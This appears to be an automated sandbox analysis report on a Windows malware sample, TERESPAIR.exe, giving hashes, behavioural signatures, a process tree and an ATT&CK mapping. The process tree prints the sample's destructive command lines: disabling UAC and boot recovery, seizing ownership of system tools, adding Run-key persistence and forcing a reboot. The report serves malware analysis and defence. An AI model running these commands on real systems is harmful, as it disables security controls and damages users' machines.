Analysis
max time kernel: 5s
max time network: 8s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 01-07-2024 02:21
Static task: static1
Behavioral task: behavioral1
Sample: TERESPAIR.exe
Resource: win11-20240508-en
General
Target: TERESPAIR.exe
Size: 551KB
MD5: 0ffccbd12475d9082cf307ad70739bdc
SHA1: 3357a844ae038543844e622839167e7ff1360474
SHA256: 4c291a0e441b43a6d0bb77f5038ca736276e735196349abb6e9d4c7cc3fd4dc5
SHA512: 7d8893b8082faf6dee334959f602c5e81192982238ce5dfd52210f7db48c73fe5ad952860f845404b7c369e3be11d3c6bc0cab2cacab993632211a5e599559ee
SSDEEP: 12288:Scv0NTIx0stUF2jL2DBzvksvkyRQ72KGNxJLACRC/q9:ScvkTIxxUFT9TvkG7lJsCUy9
Malware Config
Signatures
- UAC bypass
  Processes (process, description, ioc):
  reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- Modifies boot configuration data using bcdedit (1 TTPs, 1 IoCs)
- Possible privilege escalation attempt (12 IoCs)
  Processes (pid, process):
  4028 takeown.exe; 720 icacls.exe; 2988 takeown.exe; 3236 icacls.exe; 2628 takeown.exe; 1180 icacls.exe; 2168 takeown.exe; 1120 icacls.exe; 2240 takeown.exe; 2092 icacls.exe; 2408 takeown.exe; 4716 icacls.exe
- Modifies file permissions (1 TTPs, 12 IoCs)
  Processes (pid, process):
  4716 icacls.exe; 2240 takeown.exe; 2092 icacls.exe; 3236 icacls.exe; 2628 takeown.exe; 1180 icacls.exe; 2408 takeown.exe; 2988 takeown.exe; 2168 takeown.exe; 1120 icacls.exe; 4028 takeown.exe; 720 icacls.exe
- Modifies system executable filetype association (2 TTPs, 2 IoCs)
  Processes (process, description, ioc):
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon
  reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico"
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes (process, description, ioc):
  reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\death.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\death.exe"
- File and Directory Permissions Modification: Windows File and Directory Permissions Modification (1 TTPs)
- Drops file in System32 directory (10 IoCs)
  Processes (process, description, ioc):
  cmd.exe: File created C:\Windows\System32\mmc.exe
  cmd.exe: File opened for modification C:\Windows\System32\mmc.exe
  cmd.exe: File created C:\Windows\System32\UserAccountControlSettings.exe
  cmd.exe: File created C:\Windows\System32\chkdsk.exe
  cmd.exe: File opened for modification C:\Windows\System32\chkdsk.exe
  cmd.exe: File opened for modification C:\Windows\System32\taskmgr.exe
  cmd.exe: File created C:\Windows\System32\taskkill.exe
  cmd.exe: File opened for modification C:\Windows\System32\taskkill.exe
  cmd.exe: File opened for modification C:\Windows\System32\UserAccountControlSettings.exe
  cmd.exe: File created C:\Windows\System32\taskmgr.exe
- Drops file in Windows directory (2 IoCs)
  Processes (process, description, ioc):
  cmd.exe: File created C:\Windows\regedit.exe
  cmd.exe: File opened for modification C:\Windows\regedit.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (3 IoCs)
  Processes (pid, process):
  4632 taskkill.exe; 3456 taskkill.exe; 2484 taskkill.exe
- Modifies data under HKEY_USERS (15 IoCs)
  Processes (process, description, ioc):
  LogonUI.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
  LogonUI.exe: Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"
  LogonUI.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
  LogonUI.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"
  LogonUI.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24"
- Modifies registry class (5 IoCs)
  Processes (process, description, ioc):
  reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile
  reg.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico"
  reg.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon
- Suspicious use of AdjustPrivilegeToken (11 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege, 3456 taskkill.exe
  Token: SeDebugPrivilege, 2484 taskkill.exe
  Token: SeDebugPrivilege, 4632 taskkill.exe
  Token: SeTakeOwnershipPrivilege, 2168 takeown.exe
  Token: SeTakeOwnershipPrivilege, 4028 takeown.exe
  Token: SeTakeOwnershipPrivilege, 2988 takeown.exe
  Token: SeTakeOwnershipPrivilege, 2628 takeown.exe
  Token: SeTakeOwnershipPrivilege, 2408 takeown.exe
  Token: SeTakeOwnershipPrivilege, 2240 takeown.exe
  Token: SeShutdownPrivilege, 2352 shutdown.exe
  Token: SeRemoteShutdownPrivilege, 2352 shutdown.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes (pid, process):
  2884 LogonUI.exe
- Suspicious use of WriteProcessMemory (56 IoCs)
  Processes (description, pid, process, target process); the report lists every row twice, giving the 56 IoCs:
  PID 4364 (TERESPAIR.exe) wrote to memory of 1576 (cmd.exe)
  PID 1576 (cmd.exe) wrote to memory of 2252 (bcdedit.exe)
  PID 1576 (cmd.exe) wrote to memory of 2116 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 2740 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 4804 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 3872 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 2140 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 3408 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 4780 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 1900 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 1864 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 4904 (reg.exe)
  PID 1576 (cmd.exe) wrote to memory of 3456 (taskkill.exe)
  PID 1576 (cmd.exe) wrote to memory of 2484 (taskkill.exe)
  PID 1576 (cmd.exe) wrote to memory of 4632 (taskkill.exe)
  PID 1576 (cmd.exe) wrote to memory of 2168 (takeown.exe)
  PID 1576 (cmd.exe) wrote to memory of 1120 (icacls.exe)
  PID 1576 (cmd.exe) wrote to memory of 4028 (takeown.exe)
  PID 1576 (cmd.exe) wrote to memory of 720 (icacls.exe)
  PID 1576 (cmd.exe) wrote to memory of 2988 (takeown.exe)
  PID 1576 (cmd.exe) wrote to memory of 3236 (icacls.exe)
  PID 1576 (cmd.exe) wrote to memory of 2628 (takeown.exe)
  PID 1576 (cmd.exe) wrote to memory of 1180 (icacls.exe)
  PID 1576 (cmd.exe) wrote to memory of 2408 (takeown.exe)
  PID 1576 (cmd.exe) wrote to memory of 4716 (icacls.exe)
  PID 1576 (cmd.exe) wrote to memory of 2240 (takeown.exe)
  PID 1576 (cmd.exe) wrote to memory of 2092 (icacls.exe)
  PID 1576 (cmd.exe) wrote to memory of 2352 (shutdown.exe)
Processes (tree; depth shown by indentation, with the signatures each process triggered)
- [1] C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Arrow /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Hand /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v AppStarting /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Wait /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f
      - Modifies system executable filetype association
      - Modifies registry class
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f
      - Modifies registry class
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v death.exe /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\death.exe" /f
      - Adds Run key to start application
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\bg.jpg" /f
    - [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
    - [3] C:\Windows\system32\taskkill.exe
      Command line: taskkill /f /im regedit.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\taskkill.exe
      Command line: taskkill /f /im taskmgr.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\taskkill.exe
      Command line: taskkill /f /im mmc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\regedit.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\regedit.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\System32\taskmgr.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\System32\taskmgr.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\System32\taskkill.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\System32\taskkill.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\System32\mmc.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\System32\mmc.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\System32\UserAccountControlSettings.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\System32\UserAccountControlSettings.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\takeown.exe
      Command line: takeown /f "C:\Windows\System32\chkdsk.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe
      Command line: icacls "C:\Windows\System32\chkdsk.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\shutdown.exe
      Command line: shutdown /r /t 0
      - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\LogonUI.exe
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence:
- Event Triggered Execution (1): Change Default File Association (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Privilege Escalation:
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Event Triggered Execution (1): Change Default File Association (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Downloads
- C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat
  Filesize: 2KB
  MD5: 8894013652db082fb9a4ce91bf40222f
  SHA1: d79e5f5f4984ea0f2648b6155feecf3d786767e5
  SHA256: c3914537fd001edc8d9d9d6497cbd942de5b478d391a00ca07f86af017c62359
  SHA512: 94c3587a6d141d8e1b7f3e1b49173e65b1c51f327f5e676ee7a072384ee0fec0ed4f56a67704dbf7ad254aa16ba75490da018a9591cb5326deb317a21ae604f9
- C:\Users\Admin\AppData\Local\Temp\5767.tmp\popups.exe
  Filesize: 87KB
  MD5: d7f63114aade341d8a3f6924cdfa182a
  SHA1: ebf02b5fc29dde742321f2bc5bf80575907d7daf
  SHA256: 1e6d2f793b52c9099dea1c94bb97e1e4e10683ef588cf090a82781c67779ebeb
  SHA512: 763d369c0002b64436f74b89ffd1879f9390445713634b73e3fd3fe40ba57373efa86d0c102d79571b5f21f2ce972475517b716c7567b3fcb1fc225e94de51a5
- C:\Users\Admin\Desktop\OPENME5.txt
  Filesize: 71B
  MD5: 4207e6b2edf7d32f4ffa65b257b84598
  SHA1: 44b173829cb9a85997ebc1e9184080534404b5ff
  SHA256: 4ded9a36558a18aaf67f9cddc11e60ad4f8f45230a50626fdb60de7ee1ff0f4c
  SHA512: c4deaeb10de42d997b6fda00ff2266ee41ebb9b901043a9e6f106b166d6a2559acb9329a4ff4b611c4c6bf08662dd2461248118f5076ade34357f18973213954